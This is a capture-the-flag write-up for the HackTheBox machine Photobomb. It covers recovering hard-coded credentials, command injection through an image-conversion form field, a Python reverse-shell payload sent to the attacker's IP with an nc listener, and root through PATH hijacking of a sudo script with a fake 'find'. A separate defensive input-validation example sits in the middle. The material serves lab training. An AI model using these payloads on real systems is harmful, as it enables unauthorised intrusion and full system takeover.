HackTheBox Writeup: Photobomb

Kh4l1509lu
Oct 16, 2022

Enum
nmap 10.10.11.182 -sCV -A -T5

Two open ports are found, 22 and 80. Let's check out port 80.

Add the domain photobomb.htb to the /etc/hosts file.

This is the site running on port 80.

Let's enumerate the web content with feroxbuster:

We find some directories. http://photobomb.htb/printer looks interesting, but we don't have any credentials for its login form :(

Browsing the website, we find a JavaScript file, photobomb.js, that contains the credentials username pH0t0 / password b0Mb! :)

Navigating to it, tada :)

Then go to the login form, enter the credentials, and we are welcomed by the photo gallery panel:

There is a suspicious form with a POST action to download an image.
Intercept it with Burp Suite to get the request:

We send the request and the image is downloaded with a png extension.

Hmm. From the Burp request and the HTML source we know the source image is a jpg, so there is presumably some internal process converting it from jpg to png.
So we will try to inject into that conversion process.

POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1

photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=png;ping -c 20 10.10.14.42&dimensions=1000x1500

We test for command injection by making the target ping our machine.

On our machine, open a new tab and start listening for the ICMP echo requests with tcpdump:

tcpdump -nni tun0

And the ICMP echo requests come in:

So we replace the ping with our reverse shell payload:

export RHOST="10.10.14.42";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'

Finally, the Burp request looks like this:

POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 295
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1

photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=png;export RHOST="10.10.14.42";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'&dimensions=1000x1500

We start nc listening on our machine:

nc -lvnp 4444

We send the request from Burp and get a shell:
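The injection works because the filetype value reaches a shell unchecked. For contrast, here is how a /printer handler could validate the three form fields seen in the request above and run the converter as an argv list with no shell, so the `png;ping -c 20 10.10.14.42` value is refused and logged. This is an added example, not the box's actual code; the converter path, the output directory and the allowed patterns are assumptions.

```python
from __future__ import annotations
import re
from pathlib import Path

# Constructed allowlists; the real application's rules are not shown on the page.
ALLOWED_FILETYPES = {"png", "jpg"}
PHOTO_RE = re.compile(r"[A-Za-z0-9_-]+\.jpg")
DIMENSION_RE = re.compile(r"(\d{1,5})x(\d{1,5})")
SOURCE_DIR = Path("source_images")   # directory name taken from cleanup.sh on the box
OUTPUT_DIR = Path("/tmp")            # assumed output location
CONVERT = "/usr/bin/convert"         # assumed converter binary, called by absolute path


def build_convert_argv(photo: str, filetype: str, dimensions: str) -> list[str]:
    """Validate the three /printer form fields and return an argv list.

    Every field must fully match a strict pattern, so a value such as
    'png;ping -c 20 10.10.14.42' is rejected before any process starts.
    The list is meant for subprocess.run(argv) with shell=False, so even a
    stray metacharacter would be passed as data, never parsed as shell syntax.
    """
    if not PHOTO_RE.fullmatch(photo):
        raise ValueError(f"photo rejected: {photo!r}")
    if filetype not in ALLOWED_FILETYPES:
        raise ValueError(f"filetype rejected: {filetype!r}")
    m = DIMENSION_RE.fullmatch(dimensions)
    if not m or not all(0 < int(v) <= 10000 for v in m.groups()):
        raise ValueError(f"dimensions rejected: {dimensions!r}")
    # Path.name discards any directory part, so '../' cannot escape SOURCE_DIR.
    src = SOURCE_DIR / Path(photo).name
    dst = OUTPUT_DIR / f"{src.stem}.{filetype}"
    return [CONVERT, str(src), "-resize", dimensions, str(dst)]


def handle_print_form(form: dict[str, str]) -> tuple[list[str] | None, str]:
    """Return (argv, 'ok') for a valid form, or (None, reason) to log and refuse."""
    try:
        argv = build_convert_argv(
            form.get("photo", ""), form.get("filetype", ""), form.get("dimensions", "")
        )
    except ValueError as exc:
        return None, str(exc)
    return argv, "ok"


if __name__ == "__main__":
    # Constructed sample: the body of the injected request shown above, parsed.
    injected = {"photo": "kevin-charit-XZoaTJTnB9U-unsplash.jpg",
                "filetype": "png;ping -c 20 10.10.14.42", "dimensions": "1000x1500"}
    print(handle_print_form(injected))
    print(handle_print_form({**injected, "filetype": "png"}))
```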

Foothold

Check the id:

uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)

Check the sudo permissions:

wizard@photobomb:~/photobomb$ sudo -l
sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

Take a look at cleanup.sh:

cat /opt/cleanup.sh

Output:

#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
    /bin/cat log/photobomb.log > log/photobomb.log.old
    /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

Well, there is a find command called without an absolute path, and the sudo rule carries the SETENV tag, so we can control the PATH the script runs with.

Privilege Escalation

Here are the steps to get root.

Move to /tmp and create a fake find:

cd /tmp
touch find
echo "/bin/bash -p" > find
chmod +x find

Run /opt/cleanup.sh with PATH set so that /tmp comes first (allowed by SETENV):

sudo PATH=/tmp:$PATH /opt/cleanup.sh

Output:

wizard@photobomb:/tmp$ sudo PATH=/tmp:$PATH /opt/cleanup.sh
sudo PATH=/tmp:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb# id
id
uid=0(root) gid=0(root) groups=0(root)
root@photobomb:/home/wizard/photobomb#
